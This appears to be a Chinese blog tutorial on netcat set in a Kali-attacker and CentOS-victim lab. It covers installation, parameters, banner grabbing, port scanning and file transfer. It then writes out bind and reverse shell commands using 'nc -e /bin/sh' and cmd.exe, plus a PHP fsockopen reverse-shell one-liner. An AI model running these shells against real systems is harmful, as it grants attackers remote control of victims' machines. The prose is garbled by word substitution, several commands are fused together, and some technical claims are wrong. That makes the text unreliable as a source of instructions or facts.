在centos7.X中利用yum install nc按照的不是Netcat,须要把稳。
Windows中可以自行搜索安装,官网链接:netcat 1.11 for Win32/Win64
命令:sudo yum install glibc

命令:wget https://sourceforge.NET/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gztar -zxvf netcat-0.7.1.tar.gz -C /usr/localcd /usr/local/netcat-0.7.1./configuremake && make install
命令:vi /etc/profileexport NETCAT_HOME=/usr/local/netcat-0.7.1export PATH=$PATH:$NETCAT_HOME/bin
1.1.1.4.测试
这里可以利用nc -v,当然也可以利用netcat,实在是由于我
1.2.Netcat基本功能
telnet/获取系统bannet信息、传输文本信息、传输文件和目录、加密传输文件、端口扫描、远程掌握、正方向shell等。
1.3.Netcat常用参数Netcat它有许多参数可供给用,以下是一些常用的Netcat参数,可以根据自己的须要选择利用,同时,Netcat还有其他更多的参数,你可以通过查看其官方文档来理解。
参数
先容
-h
查看帮助信息。
-l
监听模式,等待其他打算机连接。
-p
指定监听的端口号。
-u
利用UDP协议。
-v
输出详细信息,如建立连接时显示IP地址和端口号。
-n
不该用DNS查找,利用IP地址进行连接。
-z
将输入/输出功能关闭,进行端口扫描。
-s
指定本地的IP地址。
-e
在连接建立后,将标准输入和输出重定向到一个指定的程序或脚本中。
-w
设置超时时间,等待连接或数据的韶光。
-c
发送指定字节数的数据后关闭连接。
-i
设置发送数据的韶光间隔。
-q
设置程序退出前的最大延迟韶光。
-k
启用TCP保持活动状态。
-r
设置随机本地端口号。
-t
以telnet形式应答。
2.Netcat用法
nc常常随着的参数有两个,一个是n、一个是v。
v参数便是列出实行过程的详细信息,n参数就只吸收IP地址,没有dns,之以是利用n参数,是由于利用命令的过程中只去传入IP,减少了nc把域名解析为IP的过程,这样可以节省韶光提高效率。
2.1.前期准备两台主机都须要安装nc,以便后面的操作,nc很小,安装很快。
kali主机:192.168.10.20
centos7主机:192.168.10.30
2.2.banner干系信息抓取kali命令:nc -nv 192.168.10.30 22
如果想要纯挚的端口扫描的话,利用其它工具比如nmap会更好,而利用nc的紧张用场便是在内网获取到权限后,再利用nc对内网进行扫描。nmap无法扫描内网。利用nc更多的是对内网扫描,若初期就须要端口扫描的话,不建议利用nc。
2.3.1.扫描指定端口kali命令:nc -v 192.168.10.30
kali命令:nc -vz 192.168.10.30 20-100
监听本地端口,当访问该端口时会输出该信息到命令行,这里我利用一个云做事器来监听。
云做事器命令:nc -lp 8080
首先在kali上开启监听,然后在centos7中发送文件,当发送文件后,kali上监听到后,就可以将文件保存下来。
这里不单单可以发送文件,像压缩包、目录等均可以传输,不过这里须要理解两个重定向符号 <和>,>是将文件进行输出,<是将文件进行输入。
2.5.1.监听这里设置kali监听,大略来说便是吸收文件,并将文件保存到1.txt中。
kali命令:nc -lp 333 > 1.txt
这里设置centos7为发送,将当前目录下的2.txt发送至kail。
centos7命令:nc -vn 192.168.10.20 333 < 2.txt
nc 可以在两台机器之间相互通报信息,首先须要有一台机器进行监听一个端口,另一台以连接的办法去连接其指定的端口,这样两台机器之间建立了通信后,相互之间可以传输信息。
为了区分,kali上输入的是数字,而centos7上输入的字母。
kali命令:nc -lp 333centos命令:nc -vn 192.168.10.20 333
2.7.获取shell
这里默认kail系统为攻击者、centos7系统为受害者。
2.7.1.正向获取shell正向获取shell便是将centos7连接kali,centos7获取kali的shell权限。大略来说便是受害者获取攻击者的shell。
这里不该用Windows测试,只是将Windows系统的命令利用先容一下。
2.7.1.1.攻击者kali命令:nc -lvp 4444 -e /bin/shWindows命令:nc -lvp 4444 -e c:\windows\system32\cmd.exe
centos7命令:netcat 192.168.10.20 4444
客户端连接做事器,做事器获取客户真个shell。常日用在开启防护方法的目标机,如防火墙过滤、端口转发的等。常日反向shell是最常用的。
2.7.2.1.攻击者kali命令:nc -lvp 4444
centos7命令:netcat 192.168.10.20 4444 -e /bin/shWindows命令:nc 192.168.1.1 999 -e c:\windows\system32\cmd.exe
这里其它获取shell,便是通过不同的办法进行shell的反弹。这里可以利用反弹shell命令一键天生官网进行测试。
官网:反弹shell天生器(反弹shell命令一键天生)
2.8.1.PHP反弹shell2.8.1.1.天生反弹命令
这里利用官网中配置,选择php即可天生反弹shell。
命令:php -r '$sock=fsockopen("192.168.10.20",7777);`sh -i <&3 >&3 2>&3`;'
这里的攻击者便是kali,按照官网上开启监听。
kali命令:nc -lvnp 7777
这里的受害者便是centos7,按照官网上的天生的命令进行配置,我这里centos7上没有php,以是没成功正常情形下是能够成功的,这里我紧张便是演示一下。
centos7命令:php -r '$sock=fsockopen("192.168.10.20",7777);`sh -i <&3 >&3 2>&3`;'